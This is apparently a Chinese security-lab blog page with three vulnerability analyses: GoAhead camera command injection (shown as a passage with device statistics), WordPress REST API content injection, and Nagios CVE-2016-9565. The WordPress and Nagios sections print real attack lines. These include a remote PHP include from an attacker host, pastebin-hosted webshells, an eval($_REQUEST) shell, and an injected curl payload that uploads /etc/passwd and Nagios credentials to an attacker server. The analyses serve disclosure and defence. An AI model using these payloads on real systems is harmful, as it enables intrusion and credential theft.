7746: case CGI_IESET_MAIL:

7747: if ( len == 0x00 )

7748: {

7749: iRet = cgisetmail( pbuf, pparam, byPri );

7750: IETextout( "-------------OK--------" );

7751: NoteSaveSem();

7752: }

7753:

7754: break;

与上一个远程命令执行漏洞类似，cgisetmail()函数用于将各参数储存到结构体，例如sender参数赋值给bparam.stMailParam.szSender、receiver1参数赋值给bparam.stMailParam.szReceiver1。接着，来到了cgisetmailtest()函数：

int cgisetmailtest( unsigned char* pbuf, char* pparam, unsigned char byPri )  
{
    unsigned char   temp[2048];
    int             len = 0;
    int             result = 0;
    char            nexturl[64];
    int        iRet = 0;
    memset( temp, 0x00, 2048 );

    //iRet = DoMailTest();
    if(iRet == 0)
    {
        IETextout("Mail send over, OK or Not");
    }
    /* END:   Added by Baggio.wu, 2013/10/25 */

    memset( nexturl, 0x00, 64 );
    iRet = GetStrParamValue( pparam, "next_url", nexturl, 63 );

    if ( iRet == 0x00 )
    {
#if 1
        len += RefreshUrl( temp + len, nexturl );
#endif
        memcpy( pbuf, temp, len );
    }

    else
    {
        len += sprintf( temp + len, "var result=\"ok\";\r\n" );
        memcpy( pbuf, temp, len );
    }

    printf( "sendmail len:%d\n", len );
    return len;
}

int cgisetmailtest( unsigned char* pbuf, char* pparam, unsigned char byPri )

{

unsigned char temp[2048];

int len = 0;

int result = 0;

char nexturl[64];

int iRet = 0;

memset( temp, 0x00, 2048 );

//iRet = DoMailTest();

if(iRet == 0)

{

IETextout("Mail send over, OK or Not");

}

/* END: Added by Baggio.wu, 2013/10/25 */

memset( nexturl, 0x00, 64 );

iRet = GetStrParamValue( pparam, "next_url", nexturl, 63 );

if ( iRet == 0x00 )

{

#if 1

len += RefreshUrl( temp + len, nexturl );

#endif

memcpy( pbuf, temp, len );

}

else

{

len += sprintf( temp + len, "var result=\"ok\";\r\n" );

memcpy( pbuf, temp, len );

}

printf( "sendmail len:%d\n", len );

return len;

}

该函数第十行已被注释掉。这是使用此函数发送邮件证据的唯一可寻之处。虽然被注释掉了，我们也要继续跟踪DoMailTest()这个函数：

int DoMailTest( void )     //email test  
{
    int     iRet = -1;
    char    cmd[256];

    if ( bparam.stMailParam.szSender[0] == 0 )
    {
        return -1;
    }

    if ( bparam.stMailParam.szReceiver1[0] != 0x00 )
    {
        iRet = EmailConfig();

        if ( iRet )
        {
            return -1;
        }

        memset( cmd, 0x00, 256 );

        /* BEGIN: Modified by Baggio.wu, 2013/9/9 */
        sprintf( cmd, "echo \"mail test ok\" | /system/system/bin/mailx -r %s -s \"mail test\"  %s",
                 bparam.stMailParam.szSender, bparam.stMailParam.szReceiver1 );
        //sprintf( cmd, "echo \"mail test ok\" | /system/system/bin/mailx -v -s \"mail test\"  %s",
        //         bparam.stMailParam.szReceiver1 );

        printf( "start cmd:%s\n", cmd );
        EmailWrite( cmd, strlen( cmd ) );
        //emailtest();
        printf( "cmd:%s\n", cmd );

    }

    return iRet;
}

int DoMailTest( void ) //email test

{

int iRet = -1;

char cmd[256];

if ( bparam.stMailParam.szSender[0] == 0 )

{

return -1;

}

if ( bparam.stMailParam.szReceiver1[0] != 0x00 )

{

iRet = EmailConfig();

if ( iRet )

{

return -1;

}

memset( cmd, 0x00, 256 );

/* BEGIN: Modified by Baggio.wu, 2013/9/9 */

sprintf( cmd, "echo \"mail test ok\" | /system/system/bin/mailx -r %s -s \"mail test\" %s",

bparam.stMailParam.szSender, bparam.stMailParam.szReceiver1 );

//sprintf( cmd, "echo \"mail test ok\" | /system/system/bin/mailx -v -s \"mail test\" %s",

// bparam.stMailParam.szReceiver1 );

printf( "start cmd:%s\n", cmd );

EmailWrite( cmd, strlen( cmd ) );

//emailtest();

printf( "cmd:%s\n", cmd );

}

return iRet;

}

可以看到sprintf( cmd, "echo \"mail test ok\" | /system/system/bin/mailx -r %s -s \"mail test\" %s",bparam.stMailParam.szSender, bparam.stMailParam.szReceiver1 )，发件人和收件人都直接被拼接成命令导致最后的命令执行。

三、漏洞影响范围

ZoomEye网络空间探测引擎探测结果显示，全球范围内共查询到78万条历史记录。我们根据这78万条结果再次进行探测，发现这些设备一共存在三种情况：

第一种是设备不存在漏洞。
第二种是设备存在验证绕过漏洞，由于web目录下无 system.ini，导致最终无法被利用。可以看到，当我们直接请求system.ini时显示需要认证，但当我们绕过验证之后却显示404 not found。
最后一种是设备既存在验证绕过漏洞，又存在system.ini文件。这些设备就存在被入侵的风险。

我们统计了最后一种设备的数量。数据显示有近7万的设备存在被入侵的风险。这7万设备的国家分布图如下:

可以看出，美国、中国、韩国、法国、日本均属于重灾区。我国一共有 7000 多台设备可能被入侵，其中近 6000 台位于香港。我们根据具体数据做成两张柱状图以便查看：

（注：None为属于中国，但未解析出具体地址的IP）

我们通过查询ZoomEye网络空间探测引擎历史记录导出2016年1月1日、2017年1月1日以及本报告编写日期2017年3月14日三个时间点的数据进行分析。

在这三个时间点，我们分别收录了banner中含有GoAhead 5ccc069c403ebaf9f0171e9517f40e41的设备26万台、65万台和78万台。

但对于这些IP而言，存在漏洞的设备增长趋势却完全不同。

可以看到，2016年1月1日已探明的设备中目前仅有2000多台存在漏洞，2017年1月1日之前探明的设备中有近3万台存在漏洞，截至仅仅两个多月后的今天，已有近7万台设备存在漏洞。

根据以上数据，我们可以做出如下判断：该漏洞出现时间大约是去年，直到今年被曝光之后才被大家所关注。在此期间，旧摄像头通过更新有漏洞固件的方式导致该漏洞的出现，而那些新生产的摄像头则被销往世界各地。根据今年新增IP地理位置，我们可以大致判断出这些存在漏洞的摄像头今年被销往何地。

根据数据，我们可以看到，主要销往美国、中国、韩国、日本。中国新增了5316台存在漏洞的摄像头，其中4000多台位于香港。

四、修复方案

1.将存在漏洞的摄像头设备置于内网。
2.及时升级到最新固件。
3.对于可能被感染的设备，可以采取重启的方式来杀死驻留在内存中的恶意进程。

五、参考链接

附录：Pierre Kim给出的受影响设备列表


3G+IPCam Other
3SVISION Other
3com CASA
3com Other
3xLogic Other
3xLogic Radio
4UCAM Other
4XEM Other
555 Other
7Links 3677
7Links 3677-675
7Links 3720-675
7Links 3720-919
7Links IP-Cam-in
7Links IP-Wi-Fi
7Links IPC-760HD
7Links IPC-770HD
7Links Incam
7Links Other
7Links PX-3615-675
7Links PX-3671-675
7Links PX-3720-675
7Links PX3309
7Links PX3615
7Links ipc-720
7Links px-3675
7Links px-3719-675
7Links px-3720-675
A4Tech Other
ABS Other
ADT RC8021W
AGUILERA AQUILERA
AJT AJT-019129-BBCEF
ALinking ALC
ALinking Other
ALinking dax
AMC Other
ANRAN ip180
APKLINK Other
AQUILA AV-IPE03
AQUILA AV-IPE04
AVACOM 5060
AVACOM 5980
AVACOM H5060W
AVACOM NEW
AVACOM Other
AVACOM h5060w
AVACOM h5080w
Acromedia IN-010
Acromedia Other
Advance Other
Advanced+home lc-1140
Aeoss J6358
Aetos 400w
Agasio A500W
Agasio A502W
Agasio A512
Agasio A533W
Agasio A602W
Agasio A603W
Agasio Other
AirLink Other
Airmobi HSC321
Airsight Other
Airsight X10
Airsight X34A
Airsight X36A
Airsight XC39A
Airsight XX34A
Airsight XX36A
Airsight XX40A
Airsight XX60A
Airsight x10
Airsight x10Airsight
Airsight xc36a
Airsight xc49a
Airsight xx39A
Airsight xx40a
Airsight xx49a
Airsight xx51A
Airsight xx51a
Airsight xx52a
Airsight xx59a
Airsight xx60a
Akai AK7400
Akai SP-T03WP
Alecto 150
Alecto Atheros
Alecto DVC-125IP
Alecto DVC-150-IP
Alecto DVC-1601
Alecto DVC-215IP
Alecto DVC-255-IP
Alecto dv150
Alecto dvc-150ip
Alfa 0002HD
Alfa Other
Allnet 2213
Allnet ALL2212
Allnet ALL2213
Amovision Other
Android+IP+cam IPwebcam
Anjiel ip-sd-sh13d
Apexis AH9063CW
Apexis APM-H803-WS
Apexis APM-H804-WS
Apexis APM-J011
Apexis APM-J011-Richard
Apexis APM-J011-WS
Apexis APM-J012
Apexis APM-J012-WS
Apexis APM-J0233
Apexis APM-J8015-WS
Apexis GENERIC
Apexis H
Apexis HD
Apexis J
Apexis Other
Apexis PIPCAM8
Apexis Pyle
Apexis XF-IP49
Apexis apexis
Apexis apm-
Apexis dealextreme
Aquila+Vizion Other
Area51 Other
ArmorView Other
Asagio A622W
Asagio Other
Asgari 720U
Asgari Other
Asgari PTG2
Asgari UIR-G2
Atheros ar9285
AvantGarde SUMPPLE
Axis 1054
Axis 241S
B-Qtech Other
B-Series B-1
BRAUN HD-560
BRAUN HD505
Beaulieu Other
Bionics Other
Bionics ROBOCAM
Bionics Robocam
Bionics T6892WP
Bionics t6892wp
Black+Label B2601
Bravolink Other
Breno Other
CDR+king APM-J011-WS
CDR+king Other
CDR+king SEC-015-C
CDR+king SEC-016-NE
CDR+king SEC-028-NE
CDR+king SEC-029-NE
CDR+king SEC-039-NE
CDR+king sec-016-ne
CDXX Other
CDXXcamera Any
CP+PLUS CP-EPK-HC10L1
CPTCAM Other
Camscam JWEV-372869-BCBAB
Casa Other
Cengiz Other
Chinavasion Gunnie
Chinavasion H30
Chinavasion IP611W
Chinavasion Other
Chinavasion ip609aw
Chinavasion ip611w
Cloud MV1
Cloud Other
CnM IP103
CnM Other
CnM sec-ip-cam
Compro NC150/420/500
Comtac CS2
Comtac CS9267
Conceptronic CIPCAM720PTIWL
Conceptronic cipcamptiwl
Cybernova Other
Cybernova WIP604
Cybernova WIP604MW
D-Link DCS-910
D-Link DCS-930L
D-Link L-series
D-Link Other
DB+Power 003arfu
DB+Power DBPOWER
DB+Power ERIK
DB+Power HC-WV06
DB+Power HD011P
DB+Power HD012P
DB+Power HD015P
DB+Power L-615W
DB+Power LA040
DB+Power Other
DB+Power Other2
DB+Power VA-033K
DB+Power VA0038K
DB+Power VA003K+
DB+Power VA0044_M
DB+Power VA033K
DB+Power VA033K+
DB+Power VA035K
DB+Power VA036K
DB+Power VA038
DB+Power VA038k
DB+Power VA039K
DB+Power VA039K-Test
DB+Power VA040
DB+Power VA390k
DB+Power b
DB+Power b-series
DB+Power extcams
DB+Power eye
DB+Power kiskFirstCam
DB+Power va033k
DB+Power va039k
DB+Power wifi
DBB IP607W
DEVICECLIENTQ CNB
DKSEG Other
DNT CamDoo
DVR DVR
DVS-IP-CAM Other
DVS-IP-CAM Outdoor/IR
Dagro DAGRO-003368-JLWYX
Dagro Other
Dericam H216W
Dericam H502W
Dericam M01W
Dericam M2/6/8
Dericam M502W
Dericam M601W
Dericam M801W
Dericam Other
Digix Other
Digoo BB-M2
Digoo MM==BB-M2
Digoo bb-m2
Dinon 8673
Dinon 8675
Dinon SEGEV-105
Dinon segev-103
Dome Other
Drilling+machines Other
E-Lock 1000
ENSIDIO IP102W
EOpen Open730

作者：kk | Categories:安全研究、技术分享 | Tags:

没有评论

WordPress REST API 内容注入漏洞事件分析报告

2017-03-01

作者：知道创宇404安全实验室

报告发布日期：2017年02月28日 （注：本文首发自 paper.seebug.org）

PDF 版报告下载：WordPress REST API 内容注入漏洞事件分析报告

English Version：WordPress REST API Content Injection Vulnerability Incident Analysis Report

一、事件概述

1 漏洞简介：

WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。在4.7.0版本后，REST API插件的功能被集成到 WordPress 中，由此也引发了一些安全性问题。近日，一个由 REST API 引起的影响 WordPress 4.7.0和4.7.1版本的漏洞被披露，该漏洞可以导致 WordPress 所有文章内容可以未经验证被查看、修改、删除，甚至创建新的文章，危害巨大。

2017年2月11日，知道创宇404安全实验室使用 ZoomEye 网络空间探测引擎进行扫描探测后发现，受该漏洞影响的网站仍然有15361个，其中有9338个网站已经被黑客入侵并留下了组织代号。我们针对组织代号进行统计，共发现八十余种代号。

我们使用 ZoomEye 网络空间搜索引擎搜索 "app:WordPress ver:4.7.1" ，获得36603条结果。以下是 https://www.zoomeye.org/search?t=web&q=app%3AWordPress+ver%3A4.7.1的搜索结果：

2 漏洞影响：

导致 WordPress 所有文章内容可以未经验证被查看、修改、删除，甚至创建新的文章，危害巨大。

3 影响版本：

WordPress 4.7.0
WordPress 4.7.1

二、时间线

三、漏洞验证与分析

1 漏洞验证：

PoC：

Seebug 已给出详细的复现过程，在此过程中可以使用 Seebug 收录的 PoC 来进行测试。 https://www.seebug.org/vuldb/ssvid-92637

漏洞验证扫描插件： Seebug 已更新 WordPress REST API 内容注入漏洞扫描插件。
( https://www.seebug.org/monster/ )

简单复现过程：

安装 WordPress存在漏洞版本并配置 REST API 以及 Apache+PHP+Mysql 的运行环境。加载 Apache 的 rewrite 模块以及主配置文件配置如下图：

设置 WordPress 站点为固定链接：

构造数据包：可以看到不存在任何验证信息，提示不允许编辑文章：

构造可利用数据包：当 url 为 /wp-json/wp/v2/posts/1?id=1a 时，可以看到成功跳过验证获取文章内容：

木马后门插入：

需要安装如 insert_php ， exec_php 等允许页面执行PHP 代码的插件。可以构造数据包如下：

content<span class="token punctuation">:</span>"<span class="token punctuation">[</span>insert_php<span class="token punctuation">]</span> <span class="token keyword">include</span><span class="token punctuation">(</span>'http<span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token comment">]//acommeamour.fr/tmp/xx.php'); [/insert_php][php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/php]","id":"61a"}  
</span>

content:"[insert_php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/insert_php][php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/php]","id":"61a"}

上传后木马后门被插件当做 PHP 代码执行，网站被植入后门。

2 漏洞分析：

Seebug Paper (http://paper.seebug.org/208/ )已经发表了关于此漏洞的详细分析，以此作为参考。

首先，在 ./wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php中，

这里对路由进行了正则限制，防止攻击者恶意构造 id 值，但是我们可以发现 $get 和 $post值优先于路由正则表达式生成的值。

接下来在 update_item 方法及其权限检查函数update_item_permissions_check 中：

可以看出，当我们发送一个没有响应文章的 id 时，可以通过权限检查并允许继续执行对 update_item 方法的请求。具体到代码就是让 $post 为空来绕过权限检查。

至于如何使 $post 为空，可跟进至 get_post 方法，发现其使用 wp_posts 中的 get_instance 静态方法获取文章：

当我们传入的id 不是全由数字字符组成时返回 false，从而 get_post 方法返回null，接着绕过权限检查。回头再看可执行方法 upload_item：

这里 $id 这个参数做了类型转化传递给 get_post ，而PHP类型转换时会出现这种情况：

也就是说攻击者发起 /wp-json/wp/v2/posts/1?id=1hhh 的请求就是发起了对id 为1的文章的请求。

3 漏洞修复：

在 /wp-includes/class-wp-post.php 中：

更改了对于 $post_id 的参数的传入顺序和判断条件，防止我们传入“数字+字母”这样的格式进行绕过。

四、漏洞影响分布

第一次扫描探测结果：

我们于 2017/02/11 对全球的 WordPress 网站进行了扫描探测，发现当时仍旧受影响的 WordPress 网站共有 15361个。

这些网站分别归属于82个国家与地区，其中 Top 20 国家与地区分布如下图：

第二次扫描探测结果：

我们于 2017/02/14 对全球的 WordPress 网站再次进行了扫描探测，获取最新数据如下：

现存漏洞站数量：13390 个，与 2017/02/11 数据对比减少了1971 个。其中数据重合量为12584 个，网站新增量为 806 个，存在代码执行插件的网站数量为 905 个。

第三次扫描探测结果：

我们于 2017/02/20 对全球 WordPress 网站进行了第三次扫描探测。

根据第三次得到的数据，我们发现全球依旧存在漏洞的 WordPress 网站数量为11573个，其中与第二次数据重合量为11182个，新增数量为391个，消失数量为2208个，存在代码执行插件的网站数量为69个。

三次扫描探测数据对比：

分析上图，我们发现：

存在漏洞且一直未修复的网站基数还是很大。
存在允许代码执行插件的漏洞网站数量不多，对现存漏洞网站影响不大。

Top 10国家存在漏洞网站总量与消失量对比：

根据上图我们能很清晰的看出， 02/11 后消失的漏洞网站数量约占原有漏洞网站总量的三分之一。

网页污染行为分析：

我们于 2017/02/13 探测这些网站的运行情况，发现共有 9338 个网站已经留下了黑客的痕迹（痕迹如 hacked by xxx）。

Ps：我们探测的是依旧存在漏洞的网站并获取网站最新文章信息，而在经过修复的网站上还是有可能存在黑客入侵的痕迹。

我们统计了黑客组织留下的黑客代号，发现不同的黑客代号共出现了85种。其中 Top 20黑客组织代号如下表：

上表说明的是此时依旧活跃在互联网上的针对该漏洞的黑客组织的排名。我们分析了黑客留下的痕迹，初步总结了以下几点信息：

1. 代号为w4l3XzY3 的黑客是事件早期被报道出来的黑客之一，此人曾经于2014年针对 Drupal 网站进行过相同性质的入侵行为。分析其过往行为发现该黑客一直在入侵网站挂黑页，Google搜索该代号已有295000条记录，已经是个惯犯了。
https://www.drupal.org/node/2394801

此人推特链接如下： https://twitter.com/w4l3xzy3

在 nairaland 论坛上有他留下的一些个人信息以及售卖php shell等工具的主题：http://www.nairaland.com/w4l3xzy3

2. 代号为 SA3D HaCk3D 与 MuhmadEmad 的黑客入侵后留下的页面是相似的，宣传反 ISIS 的信息。前者提到了 peshmarga ，应该是一个中东国家，具有反美倾向。后者提到了 kurdistan ，是黑客组织 “ KurdLinux_Team ” 的成员。该人疑似曾在推特上炫耀自己的黑客行为。
https://twitter.com/muhmademad

3. 代号为 GeNErAL HaCkEr ，GeNErAL 与 RxR HaCkEr 的黑客同样疑似出自同一组织。他们还留下了一个 qq 号码：21*****233 。
搜索该账号获得信息如下图：

可以看到组织名为 “ Team Emirates” 搜索相关信息发现一个疑似的相关推特https://twitter.com/rxrhackerr

4. 代号为 GHoST61 的黑客留下的信息为土耳其语，翻译出来大意是“土耳其无处不在”，疑似为出自土耳其的黑客组织。

五、后续影响分析

暗链与插件导致的PHP代码注入与 RCE ：

我们发现当未修复漏洞的网站启用了如 insert_php 或 exec_php 等允许网页执行 PHP 代码的插件时，黑客利用此漏洞除了能够在网页中插入暗链还能在网站中注入后门并以此牟利。

我们在15361个未修复漏洞的目标站点中，探测到的使用了这两种插件的网站有905个，已经被注入木马后门的网站一共有158个。其中插入的一句话木马口令共有98种。

暗链发现情况：

在本次探测到的数据中发现暗链出现频率第一的网址 http://biturlz.com ，重定向到 https://bitly.com 这个网址，出现次数355次。

出现频率第二的是 www.yellowfx.com 这个网址，53次。

余下的网址出现频率则比较接近，分布范围较广。

本次探测到的黑客shell地址如下：

http://pastebin.com/raw/ku5zcKfu
https://paste.ee/r/3TwsC/0
http://pastebin.com/k20u5zcKfu
http://pastebin.com/raw/F9ffPKBM
http://pastebin.com/raw/gYyy6Jd7
http://pastebin.com/raw/fXB166iS
http://pastebin.com/raw/gLc9bi4z
http://acommeamour.fr/tmp/3jqy4.php

PHP shell 种类：

从探测到的数据分析，此次事件中出现的shell种类如下：

<span class="token number">1</span>： <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">isset<span class="token punctuation">(</span></span><span class="token global">$_REQUEST</span><span class="token punctuation">[</span>xxx<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">{</span><span class="token function">eval<span class="token punctuation">(</span></span><span class="token global">$_REQUEST</span><span class="token punctuation">[</span>xxx<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>exit<span class="token punctuation">;</span><span class="token punctuation">}</span>  
<span class="token number">2</span>： <span class="token keyword">include</span><span class="token punctuation">(</span>‘<span class="token punctuation">;</span>http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>pastebin<span class="token punctuation">.</span>com<span class="token operator">/</span>raw<span class="token operator">/</span>F9ffPKBM’<span class="token punctuation">;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  
<span class="token number">3</span>： <span class="token function">file_put_contents<span class="token punctuation">(</span></span>‘<span class="token punctuation">;</span>wp<span class="token operator">-</span>content<span class="token operator">/</span>uploads<span class="token operator">/</span>info<span class="token punctuation">.</span>php’<span class="token punctuation">;</span> ”<span class="token punctuation">;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  
<span class="token number">4</span>： <span class="token function">fwrite<span class="token punctuation">(</span></span><span class="token function">fopen<span class="token punctuation">(</span></span>‘<span class="token punctuation">;</span>wp<span class="token operator">-</span>content<span class="token operator">/</span>uploads<span class="token operator">/</span>wp<span class="token punctuation">.</span>php’<span class="token punctuation">;</span>’<span class="token punctuation">;</span>w<span class="token operator">+</span>’<span class="token punctuation">;</span><span class="token punctuation">)</span><span class="token function">file_get_contents<span class="token punctuation">(</span></span>‘<span class="token punctuation">;</span>http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>pastebin<span class="token punctuation">.</span>com<span class="token operator">/</span>raw<span class="token operator">/</span>ku5zcKfu’<span class="token punctuation">;</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  
<span class="token number">5</span>： <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token function">copy<span class="token punctuation">(</span></span>‘<span class="token punctuation">;</span>https<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>paste<span class="token punctuation">.</span>ee<span class="token operator">/</span>r<span class="token operator">/</span>3TwsC<span class="token operator">/</span><span class="token number">0</span>’<span class="token punctuation">;</span> ‘<span class="token punctuation">;</span>db<span class="token punctuation">.</span>php’<span class="token punctuation">;</span><span class="token punctuation">)</span> <span class="token punctuation">)</span>  
    <span class="token punctuation">{</span><span class="token keyword">echo</span> ‘<span class="token punctuation">;</span>Content_loaded_please_wait<span class="token operator">!</span>’<span class="token punctuation">;</span><span class="token punctuation">;</span><span class="token punctuation">}</span><span class="token keyword">else</span><span class="token punctuation">{</span><span class="token keyword">echo</span> ‘<span class="token punctuation">;</span>Content_failed<span class="token punctuation">.</span>’<span class="token punctuation">;</span><span class="token punctuation">;</span><span class="token punctuation">}</span>

1： if(isset($_REQUEST[xxx])){eval($_REQUEST[xxx]);exit;}

2： include(‘;http://pastebin.com/raw/F9ffPKBM’;);

3： file_put_contents(‘;wp-content/uploads/info.php’; ”;);

4： fwrite(fopen(‘;wp-content/uploads/wp.php’;’;w+’;)file_get_contents(‘;http://pastebin.com/raw/ku5zcKfu’;));

5： if ( copy(‘;https://paste.ee/r/3TwsC/0’; ‘;db.php’;) )

{echo ‘;Content_loaded_please_wait!’;;}else{echo ‘;Content_failed.’;;}

总结：

黑客利用 pastebin.com 等网站存放 shell，目前为止这些网站已经开始陆续关闭。攻击峰潮已过，我们需要抓紧进行事后补救工作。

值得注意的是虽然本次探测到的被植入后门的网站数量并不是很多，但是修复漏洞并不代表清理了后门，所以实际被挂马的网站数量将会更多。

建议启用类似 insert-php 插件的用户在升级 WordPress之后检查网站目录，查杀木马。尤其是 wp-content/uploads/ 目录，检查网站目录下是否出现文件改动如 wp.php、 info.php、db.php 等文件并核查文件内容。

从获取到的黑客shell 内容分析，index.php 、 apis.php、wp.php、info.php、db.php、css.php、insert_php.php 这些文件需要重点检查。

对于此次事件，我们还将予以持续跟进。

六、漏洞修复方案

升级 WordPress到最新版 4.7.2 ，可以选择下载 WordPress 4.7.2 或者前往后台更新面板手动点击升级。支持后台自动升级的网站已经自动完成升级过程。

七、相关链接

关于

404 Team，国内黑客文化浓厚的知名安全公司知道创宇神秘而核心的部门，最为大家熟知的分享包括：KCon 黑客大会、Seebug 漏洞平台、ZoomEye 钟馗之眼网络空间搜索引擎。

404 Team 依托 Seebug 与 ZoomEye 两大平台能力及内部的漏洞相关工业化平台能力（WSL），总能在漏洞爆发的最小黄金周期内完成全球性响应。

除了依托这些开放平台打造了全球黑客生态圈之外，404 Team 还在持续创新创造，为整个知道创宇业务需求输出精心打磨的漏洞弹药及相关安全产品。

404 Team，守正出奇，知行合一。

作者：kk | Categories:安全研究、技术分享 | Tags:

没有评论

Nagios Core 代码执行漏洞（CVE-2016-9565）分析

2016-12-23

Author: p0wd3r, dawu (知道创宇404安全实验室)

Date: 2016-12-15

0x00 漏洞概述

1.漏洞简介

Nagios 是一款监控IT基础设施的程序，近日安全研究人员 Dawid Golunski 发现在 Nagios Core 中存在一个代码执行漏洞：攻击者首先伪装成 RSS 订阅源，当受害应用获取 RSS 信息时攻击者将恶意构造的数据传给受害者，程序在处理过程中将恶意数据注入到了 curl 的命令中，进而代码执行。

2.漏洞影响

漏洞触发前提：

攻击者可伪装成https://www.nagios.org，利用 dns 欺骗等方法
攻击者被授权，或者攻击者诱使授权用户访问rss-corefeed.php、rss-newsfeed.php和rss-corebanner.php其中一个文件。

成功攻击可执行任意代码。

3.影响版本

Nagios Core < 4.2.2

0x01 漏洞复现

1. 环境搭建

Dockerfile:

FROM quantumobject/docker-nagios

RUN sed -i '99d' /usr/local/nagios/share/includes/rss/rss_fetch.inc

RUN mkdir /tmp/tmp && chown www-data:www-data /tmp/tmp

FROM quantumobject/docker-nagios

RUN sed -i '99d' /usr/local/nagios/share/includes/rss/rss_fetch.inc

RUN mkdir /tmp/tmp && chown www-data:www-data /tmp/tmp

然后运行：

docker run -p 80:80 --name nagios -d quantumobject/docker-nagios

1	docker run -p 80:80 --name nagios -d quantumobject/docker-nagios

访问http://127.0.0.1/nagios，用nagiosadmin:admin登录即可

2.漏洞分析

漏洞触发点在/usr/local/nagios/share/includes/rss/extlib/Snoopy.class.inc第657行，_httpsrequest函数中：

// version < 4.2.0
exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);

// vserion >= 4.2.0 && version < 4.2.2
exec($this->curl_path." -D \"/tmp/$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return);

// version < 4.2.0

exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);

// vserion >= 4.2.0 && version < 4.2.2

exec($this->curl_path." -D \"/tmp/$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return);

这里使用了escapeshellcmd来对命令参数进行处理，escapeshellcmd的作用如下：

作者意在防止多条命令的执行，但是这样处理并没有防止注入多个参数样如果$URI可控，再配合curl的一些特性便可以进行文件读写，进而代码执行。（一般来说为防止注入多个参数要使用 escapeshellarg，但该函数也不是绝对安全，详见 CVE-2015-4642。）

因为之前爆出的 CVE-2008-4796，代码在4.2.0版本做了改变，但是该补丁可以被绕过，只要我们在输入中闭合前后的"即可。

下面我们来看$URI是否可控。根据代码逻辑来看，_httpsrequet被usr/local/nagios/share/includes/rss/rss_fetch.inc中的fetch_rss函数调用，这样我们创建这样一个测试文件test.php：

<?php  
define('MAGPIE_DIR', './includes/rss/');  
define('MAGPIE_CACHE_ON', 0);  
define('MAGPIE_CACHE_AGE', 0);  
define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache');  
require_once(MAGPIE_DIR.'rss_fetch.inc');

fetch_rss('https://www.baidu.com --version');

<?php

define('MAGPIE_DIR', './includes/rss/');

define('MAGPIE_CACHE_ON', 0);

define('MAGPIE_CACHE_AGE', 0);

define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache');

require_once(MAGPIE_DIR.'rss_fetch.inc');

fetch_rss('https://www.baidu.com --version');

访问http://127.0.0.1/nagios/test.php之后开启动态调试，我们在上述exec函数处下断点，函数调用栈如下：

$URI情况如下：

可知$URI可控，并且在传入过程中没有被过滤。

接下来需要构造curl参数来得到我们想要的结果，这里我们使用 Dawid Golunski 提供的 Exp，需要注意的是，他提供的代码可验证4.2.0之前的版本，若验证版本大于等于4.2.0且小于4.2.2时，需对其代码进行一下更改，加上闭合所需要的双引号：

# 第44行
self.redirect('https://' + self.request.host + '/nagioshack" -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '"', permanent=False)

1 2	# 第44行 self.redirect('https://' + self.request.host + '/nagioshack" -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '"', permanent=False)

该 Exp 具体流程如下：

在攻击者的服务器上开启一个 http/https 服务器
受害者使用fetch_rss向该服务器发其请求
攻击者收到请求后对其进行重定向，重定向 url 为 https:// + 攻击者服务器 + payload，payload 中使用-F将文件内容发送给服务器，--trace-ascii将流量记录到文件中（类似 Roundcube RCE 中 mail函数的-X）。
服务器接收到重定向的请求后进行了以下三个操作：
1. 解析文件内容
2. 返回后门内容进而通过流量记录写到后门文件中
3. 返回构造好的XML，在description中添加<img src=backdoor.php>
受害者解析XML并将description的内容输出到html中，进而自动执行后门

为了方便验证，我们在网站目录下创建一个exp.php:

<?php  
define('MAGPIE_DIR', './includes/rss/');  
define('MAGPIE_CACHE_ON', 0);  
define('MAGPIE_CACHE_AGE', 0);  
define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache');  
require_once(MAGPIE_DIR.'rss_fetch.inc');
fetch_rss('http://172.17.0.3');

<?php

define('MAGPIE_DIR', './includes/rss/');

define('MAGPIE_CACHE_ON', 0);

define('MAGPIE_CACHE_AGE', 0);

define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache');

require_once(MAGPIE_DIR.'rss_fetch.inc');

fetch_rss('http://172.17.0.3');

（仅为验证漏洞，这里我们并没有解析XML）然后我们在172.17.0.3上运行 Exp，然后访问http://127.0.0.1/exp.php即可得到结果：

实际测试时 Exp 中的后门代码有可能在日志中会被截断从而导致命令执行不成功，建议写入简短的一句话：

真实情况下，fetch_rss的调用情况如下：

可见我们并不能控制其参数的值，所以只能通过 dns 欺骗等手段使目标对https://www.nagios.org的访问指向攻击者的服务器，进而触发漏洞。

3.补丁分析

4.2.2版本中删除了includes/以及rss-corefeed.php、rss-newsfeed.php和rss-corebanner.php。

0x02 修复方案

升级到4.2.2

0x03 参考

Seebug漏洞详情
https://www.seebug.org/vuldb/ssvid-92573
Dawid Golunski 的漏洞报告：
http://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
escapeshellcmd的使用手册：
http://php.net/manual/zh/function.escapeshellcmd.php

